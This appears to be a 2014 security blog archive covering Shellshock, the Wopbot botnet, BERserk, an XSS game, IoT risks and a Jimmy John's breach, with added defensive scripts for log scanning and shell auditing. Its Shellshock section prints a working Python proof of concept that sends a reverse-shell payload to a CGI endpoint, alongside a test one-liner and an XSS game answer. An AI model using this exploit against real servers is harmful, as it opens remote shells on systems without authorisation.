8 Year Old Gets Shell Access

The bar has been raised and set. Zero Cool from the movie “Hackers” was 11. This 8-year-old got shell access during a live demo.

Posted in Security Blog | Tagged , , , , , | Comments Off on 8 Year Old Gets Shell Access

XSS Games


Test your h4cking skillz with the XSS Game at https://xss-game.appspot.com/.

Hint: the first answer is: <script>alert("XSS");</script>


BERserk Vulnerability


If you use Firefox or Chrome as a web browser, it is time to update them. The Mozilla Network Security Services (NSS) crypto library, a collection of cryptographic algorithms used for a variety of Internet standards, currently allows attackers to forge RSA signatures. RSA is a method of encryption that helps ensure that your data is transmitted securely across the Web. If you see a website marked with “https://,”.

Sites that we think are secure might not be so secure after all. This means that if you’re shopping or banking on a website that uses SSL (or “https://”), your personal information could be exposed.

https://www.mozilla.org/en-US/firefox/new/
http://googlechromereleases.blogspot.com/2014/09/stable-channel-update_24.html


Black Hat. Hacking. Explosions. Thor?

In a world of global cybercrime, Legendary’s Blackhat follows a furloughed convict and his American and Chinese partners as they hunt a high-level cybercrime network from Chicago to Los Angeles to Hong Kong to Jakarta.


WOPBOT BotNet

A botnet named wopbot, which runs on Linux and Linux-variant servers, uses the Bash Shellshock bug to auto-infect others. The wopbot botnet is active and scanning the internet for vulnerable systems, including network ranges at the United States Department of Defense. The US DoD network in question is the 215.0.0.0/8 range, with approximately 16.7 million addresses.

Apache web servers around the world could be at risk if their common gateway interface (CGI) scripts invoke Bash. Every operating system below, with the exception of the Windows OS, needs to be evaluated for the Shellshock bug.


Wopbot is a command and control malware botnet. It zombifies targets and allows them to be used in Distributed Denial of Service (DDoS) attacks.
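To see whether a web server has been hit by this kind of scanning, its access log can be searched for header values that begin with a Bash function definition. The following is an added example, not code from the original post: the log lines are constructed, the function name is hypothetical, and it assumes Apache's "combined" log format, which records only the Referer and User-Agent headers.

```python
import re
from collections import defaultdict

# Apache "combined" format: ip ident user [time] "request" status size "referer" "agent"
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"')
# A header value that *starts* with a function definition such as "() {".
# Anchoring at the start avoids flagging harmless text like "function(){}" mid-value.
FUNC_DEF = re.compile(r'\s*\(\s*\)\s*\{')

# Constructed sample lines (documentation IP ranges, harmless echo marker).
SAMPLE_LOG = """\
192.0.2.10 - - [25/Sep/2014:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Sep/2014:10:01:05 +0000] "GET /cgi-bin/test.cgi HTTP/1.0" 200 0 "-" "() { :;} ; echo ThisSystemIsVulnerable"
198.51.100.7 - - [25/Sep/2014:10:01:06 +0000] "GET /cgi-bin/status HTTP/1.0" 404 0 "(){ :; }; echo ThisSystemIsVulnerable" "-"
203.0.113.44 - - [25/Sep/2014:10:02:00 +0000] "GET /app HTTP/1.1" 200 90 "http://example.com/?cb=function(){}" "Mozilla/5.0"
"""

def find_probes(lines):
    """Map source IP -> list of (time, request, header) for headers starting with '() {'."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not combined format: skipped rather than guessed at
        for header in ("referer", "agent"):
            if FUNC_DEF.match(m.group(header)):
                hits[m.group("ip")].append((m.group("time"), m.group("request"), header))
    return dict(hits)

if __name__ == "__main__":
    for ip, events in find_probes(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {len(events)} probe(s)")
        for when, request, header in events:
            print(f"  {when}  {request}  via {header}")
```

A 200 status on a flagged request to a CGI path deserves a closer look than a 404, since the script actually ran.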

INFOGRAPHIC: Shellshock


Many IoT devices run embedded Linux distributions with Bash

I’m not trying to perform a Chicken Little, but outside of corporate data centers, the average homeowner with some cool computerized toys who doesn’t perform regular updates is very vulnerable and prone to privacy loss. Some devices are subject to abuse.

Here are some items in the modern house that could be running the bash shell:

  • Bluetooth/NFC door locks
  • Home thermostat
  • Home security systems
  • Baby monitors
  • Smart fridges

Some of these items can be exploited. Doors could be unlocked and thermostats messed with at all hours of the day or night. Video feeds from Internet-connected cameras in security systems and baby monitors could be put onto a website open to the public, which can lead to literal nightmares (see the article Lights, Camera, Hacktion).

The smart fridges have more capability, though, leading to stronger types of exploits and abuse that could place an individual under investigation, and even slander them. Vulnerable smart fridges have been used in the past to perform spam and phishing attacks (see the article The Internet of Things). Since they are more robust, they can be more vulnerable. I can’t confirm whether the fridges are running bash, but they are vulnerable to user configurations… especially if they don’t get patched. What if someone used a fridge in a spam attack? No big deal for a consumer. They patch and move on. But what if destructive malware was uploaded? Or the fridge was converted into a piracy server? Even worse, what if it turns into a child pornography server?

Possible ramifications for the fridge owner include public humiliation and time spent on reputation repair.

A lot of this post is speculation, but I strongly believe that these threats can be realized. Bash being exploitable is very dangerous and proper measures should be taken.


Old Android Browser, iOS8, & Home Depot


I love these 60 second updates by Sophos.


Palo Verde Nuclear Generating Station Evacuated


MCSO: Palo Verde building evacuated after bomb threat

A building at the Palo Verde Nuclear Generating Station was evacuated Wednesday after a bomb threat, authorities said.
Check out this story on azcentral.com: http://azc.cc/1pdN5ES

It was just a threat.


BASH (Bourne-Again SHell) ShellShock Bug


Stephane Chazelas, IT Manager at SeeByte, discovered a vulnerability in bash, related to how environment variables are processed: trailing code in function definitions was executed, independent of the variable name.

For those unfamiliar, Bash is a command processor, typically run in a text window, allowing the user to type commands which cause actions. Bash can also read commands from a file, called a script. Like all Unix shells, it supports filename wildcarding, piping, here documents, command substitution, variables and control structures for condition-testing and iteration. The keywords, syntax and other basic features of the language were all copied from sh. Other features, e.g., history, were copied from csh (C Shell) and ksh (Korn Shell). Bash is a POSIX shell but with a number of extensions.

The name itself is an acronym, a pun, and a description. As an acronym, it stands for Bourne-again shell, referring to its objective as a free replacement for the Bourne shell. As a pun, it expressed that objective in a phrase that sounds similar to born again, a term for spiritual rebirth. The name is also descriptive of what it did, bashing together the features of sh, csh (C Shell), and ksh (Korn Shell).

A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.

Description of bash from Wikipedia!

How to Check
To determine if a Linux or Unix system is vulnerable, run the following command in your shell:
env X="() { :;} ; echo ThisSystemIsVulnerable" /bin/sh -c "echo completed"

If it returns the word ThisSystemIsVulnerable, then you are vulnerable.
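The one-liner above tests /bin/sh only, and on some distributions (Debian and Ubuntu, for example) /bin/sh is dash rather than Bash, so it can come back clean while a vulnerable Bash is still installed. The script below is an added example, not code from the original post: it runs the same harmless probe against each Bash-like shell on the host, and the candidate paths and function names are assumptions.

```python
import os
import subprocess

MARKER = "ThisSystemIsVulnerable"
# Same crafted value as the one-liner: a function definition followed by trailing code.
PROBE = "() { :;} ; echo " + MARKER
# Only Bash is affected; "sh" is included because it is often a link to Bash.
BASH_NAMES = {"sh", "bash", "rbash"}

def candidate_shells(shells_file="/etc/shells"):
    """Paths worth testing: the two usual locations plus matching /etc/shells entries."""
    paths = ["/bin/sh", "/bin/bash"]
    try:
        with open(shells_file) as fh:
            for line in fh:
                path = line.strip()
                if path.startswith("#"):
                    continue
                if os.path.basename(path) in BASH_NAMES and path not in paths:
                    paths.append(path)
    except OSError:
        pass  # no readable shells file: keep the two defaults
    return paths

def check_shell(path):
    """True: trailing code ran (vulnerable). False: it did not. None: could not test."""
    if not (os.path.isfile(path) and os.access(path, os.X_OK)):
        return None
    try:
        result = subprocess.run(
            [path, "-c", "echo completed"],
            env={"X": PROBE, "PATH": "/usr/bin:/bin"},  # minimal env carrying only the probe
            capture_output=True, text=True, timeout=5)
    except (OSError, subprocess.TimeoutExpired):
        return None
    return MARKER in result.stdout

def audit(paths=None):
    """Run check_shell over each path (default: candidate_shells())."""
    return {path: check_shell(path) for path in (paths or candidate_shells())}

if __name__ == "__main__":
    labels = {True: "VULNERABLE", False: "not vulnerable", None: "skipped"}
    for path, verdict in audit().items():
        print(f"{path}: {labels[verdict]}")
```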

Proof of Concept Code
#
#CVE-2014-6271 cgi-bin reverse shell
#

import httplib,urllib,sys

if (len(sys.argv)<4):
    print "Usage: %s " % sys.argv[0]
    print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
    exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
"test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data


Jimmy John’s

Jimmy John’s announced that they had a data security breach on their website.

“Approximately 216 stores appear to have been affected by this event,” Jimmy John’s said in the statement. “Cards impacted by this event appear to be those swiped at the stores, and did not include those cards entered manually or online. The credit and debit card information at issue may include the card number and in some cases the cardholder’s name, verification code, and/or the card’s expiration date. Information entered online, such as customer address, email, and password, remains secure.”

There are more than 1,900 franchised Jimmy John’s locations across the United States, meaning this breach impacted roughly 11 percent of all stores.

The statement from Jimmy John’s doesn’t name the point of sale vendor, but company officials confirm that the point-of-sale vendor that was compromised was indeed Signature Systems. Officials from Signature Systems could not be immediately reached for comment, and it remains unclear if other companies that use its point-of-sale solutions may have been similarly impacted.
